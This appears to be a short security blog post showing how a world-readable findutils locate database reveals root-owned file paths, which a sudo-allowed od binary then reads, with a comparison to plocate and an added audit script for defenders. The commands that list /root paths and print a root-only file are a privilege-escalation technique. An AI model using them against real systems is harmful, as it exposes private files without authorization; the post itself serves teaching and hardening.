Leaking file paths with findutils locate
Say you are trying to escalate privileges on a Linux box. You’ve found out that one of the binaries you are allowed to run with sudo enables you to read arbitrary files.
lowpriv@ubuntubox:~$ sudo -l
Matching Defaults entries for lowpriv on ubuntubox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User lowpriv may run the following commands on ubuntubox:
(root) NOPASSWD: /usr/bin/od
You poke around, try to guess some paths for potentially interesting files, but you find nothing of use.
In this situation, locate from findutils may come in handy if it is present on the box. The default db file of this version of locate is world-readable and may disclose paths of files that your user has no access to.
lowpriv@ubuntubox:~$ ls -la /var/cache/locate/locatedb
-rw-r--r-- 1 root root 1208122 Dec 5 21:37 /var/cache/locate/locatedb
lowpriv@ubuntubox:~$ locate -r '^/root/'
/root/.bash_history
/root/.bashrc
/root/.profile
/root/.viminfo
/root/stuff
/root/stuff/secret.txt
lowpriv@ubuntubox:~$ # now use `od` to read secret.txt
lowpriv@ubuntubox:~$ printf "$(sudo od -An -c -w9999 /root/stuff/secret.txt | sed 's/ //g')"
Secret stuff...
More secret stuff...
Interestingly, plocate does not have this problem. The db file is not world-readable, and the command output seems to be filtered based on user permissions.
lowpriv@ubuntubox:~$ ls -la /var/lib/plocate/plocate.db
-rw-r----- 1 root plocate 2270301 Dec 6 21:37 /var/lib/plocate/plocate.db
lowpriv@ubuntubox:~$ /usr/bin/plocate -r '^/root'
/root
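
A defender-side check for the condition described above, as an added example that is not part of the original post: it flags a locate database that unprivileged users can open, testing the read bit on the file and the search bit on each parent directory. The function names and the `AUDIT_ROOT` variable (prefix of a mounted image to audit) are assumptions of this example; run it as root so restricted directories are visible.

```shell
#!/bin/sh
# Added example: flag locate databases that any local user can open.
# AUDIT_ROOT (hypothetical knob) is the prefix of a mounted image; default /.

# True when "other" holds every permission bit in octal mask $2 on path $1.
other_has() {
    [ -n "$(find "$1" -prune -perm "-$2" 2>/dev/null)" ]
}

# True when the file is o+r and every ancestor directory up to the audit
# root is o+x, i.e. an unprivileged account can actually reach and read it.
world_readable() {
    other_has "$1" 004 || return 1
    stop=${AUDIT_ROOT:-/}
    [ "$stop" = / ] || stop=${stop%/}
    dir=$(dirname "$1")
    while [ "$dir" != "$stop" ] && [ "$dir" != / ] && [ "$dir" != . ]; do
        other_has "$dir" 001 || return 1
        dir=$(dirname "$dir")
    done
    return 0
}

# Check each database path; print one line per path and return non-zero
# when at least one is world-readable. Defaults are the two paths on this page.
audit_locate_dbs() {
    prefix=${AUDIT_ROOT:-/}
    prefix=${prefix%/}
    [ $# -gt 0 ] || set -- "$prefix/var/cache/locate/locatedb" \
                           "$prefix/var/lib/plocate/plocate.db"
    findings=0
    for db in "$@"; do
        if [ ! -e "$db" ]; then
            printf 'absent          %s\n' "$db"
        elif world_readable "$db"; then
            printf 'WORLD-READABLE  %s\n' "$(ls -ld "$db")"
            findings=$((findings + 1))
        else
            printf 'restricted      %s\n' "$(ls -ld "$db")"
        fi
    done
    [ "$findings" -eq 0 ]
}

audit_locate_dbs "$@" || echo 'world-readable locate database found' >&2
```

Other database locations can be passed as arguments; the exit status of `audit_locate_dbs` makes it usable from a configuration-compliance job.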